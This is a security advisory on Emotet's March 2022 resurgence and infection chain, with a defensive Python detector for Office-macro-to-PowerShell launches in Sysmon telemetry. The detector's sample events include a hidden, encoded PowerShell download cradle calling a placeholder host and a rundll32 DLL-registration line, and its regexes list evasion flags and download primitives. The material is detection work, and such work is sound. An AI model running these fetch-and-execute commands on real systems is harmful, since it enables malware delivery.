Emotet Botnet Activity Tripled in Just One Month

Apr 16, 2022 | Security Advisory

Emotet activity grew by more than 200% in March 2022 alone, according to Kaspersky [1]. This jump indicates that the operators behind the botnet have sharply escalated their activity since Q4 2021.

Emotet is both a botnet and a malware family capable of exfiltrating sensitive data; it has historically targeted the financial sector. Its infrastructure was taken down in January 2021 by a coordinated law-enforcement operation involving Europol, the FBI and other agencies. In mid-November 2021 the botnet returned, redeployed through TrickBot, and has since been used in campaigns that end in ransomware.

Kaspersky's telemetry shows the number of victims rising from 2,843 in February 2022 to 9,086 in March, while detections by its products rose from roughly 16,000 in February to about 49,000 in March [1].

A typical Emotet infection starts with a spam (malspam) email carrying an Office attachment that contains a malicious macro. If the user enables and runs the macro, it launches PowerShell, which executes a module loader; the loader then contacts the command-and-control (C&C) server to download additional malicious modules. In Kaspersky's research, the test environment retrieved 10 of the 16 known modules, most of which Emotet has used in the past [1].
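The one step of that chain a defender can observe on every host is an Office process spawning a script host, usually PowerShell with a hidden window and an encoded download cradle. The detector below is an added example written for this advisory; it is not Kaspersky's tooling or anything from Emotet itself. It scores Sysmon Event ID 1 style records (ParentImage, Image, CommandLine), decodes any -EncodedCommand argument (PowerShell expects UTF-16LE base64), and flags Office-to-script-host launches and download cradles. The events, paths and the example.invalid URL are constructed for the demonstration, not real telemetry.

```python
"""Flag the Office-macro -> PowerShell -> loader step of an Emotet-style
infection chain in process-creation telemetry (Sysmon Event ID 1 fields).

Added example for this advisory; not Kaspersky's tooling or Emotet code.
All sample events below are constructed, not real telemetry.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
# so match the common prefixes followed by a base64 blob.
ENC_RE = re.compile(r"(?<![\w-])-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})",
                    re.IGNORECASE)
# Flags macros typically pass to keep the console invisible and skip policy.
EVASION_RE = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop\b|noprofile|ep\s+bypass|"
                        r"exec(?:utionpolicy)?\s+bypass|noni\b|noninteractive)",
                        re.IGNORECASE)
# Download-and-execute primitives a loader stage commonly uses.
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                       r"Net\.WebClient|\bIEX\b|Invoke-Expression|Start-BitsTransfer",
                       re.IGNORECASE)


def basename(path):
    """Final path component, lower-cased, for either slash style."""
    return re.split(r"[\\/]", path)[-1].lower()


def encode_command(ps):
    """Encode a one-liner the way -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Score one process-creation event and list the reasons it looks bad."""
    parent, image = basename(ev["ParentImage"]), basename(ev["Image"])
    cmd = ev.get("CommandLine", "")
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("office_spawned_script_host")
    if EVASION_RE.search(cmd):
        reasons.append("evasion_flags")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded_command")
    if CRADLE_RE.search(cmd) or (decoded and CRADLE_RE.search(decoded)):
        reasons.append("download_cradle")
    # Evasion flags alone are common in admin scripts; require a stronger signal.
    suspicious = "office_spawned_script_host" in reasons or "download_cradle" in reasons
    return {"parent": parent, "image": image, "reasons": reasons,
            "decoded": decoded, "suspicious": suspicious}


def scan(events):
    """Return the scored results for events that look like the macro -> loader step."""
    return [r for r in (score_event(e) for e in events) if r["suspicious"]]


# Constructed sample telemetry (hypothetical paths and URL, not real events).
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Macro launches hidden PowerShell with an encoded download cradle (malicious).
    {"ParentImage": OFFICE + r"\WINWORD.EXE", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -nop -enc " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/ld')")},
    # User opens Word from Explorer (benign).
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": OFFICE + r"\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" /n report.docx'},
    # Word spawns the print helper (benign: not a script host).
    {"ParentImage": OFFICE + r"\WINWORD.EXE", "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "C:\\Windows\\splwow64.exe 12288"},
    # Admin runs a script with a relaxed policy (evasion flag alone is not flagged).
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -ep bypass -File C:\\ops\\backup.ps1"},
    # Excel macro registers a dropped DLL through cmd/rundll32 (malicious).
    {"ParentImage": OFFICE + r"\EXCEL.EXE", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c rundll32 C:\\Users\\Public\\ld.dll,DllRegisterServer"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["parent"], "->", hit["image"], hit["reasons"])
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

The decision rule deliberately does not fire on evasion flags alone, since administrators routinely run `-ep bypass`; the Office parent or a download cradle is what separates the macro stage from normal scripting. In production the same logic belongs in the SIEM or EDR rule engine rather than a script, and the parent-child pair should be joined with the file-origin (Mark-of-the-Web) of the opened document.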

References

[1] Kaspersky, "TrickBot's new tricks", https://www.kaspersky.com/blog/trickbot-new-tricks/42622/

Disclaimer

The information provided in the Arcane Security Advisory is provided "as is" without warranty of any kind. Arcane disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Arcane or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits, or special damages, even if Arcane or its suppliers have been advised of the possibility of such damages.

Tags: #emotet #ransomware #security-advisory
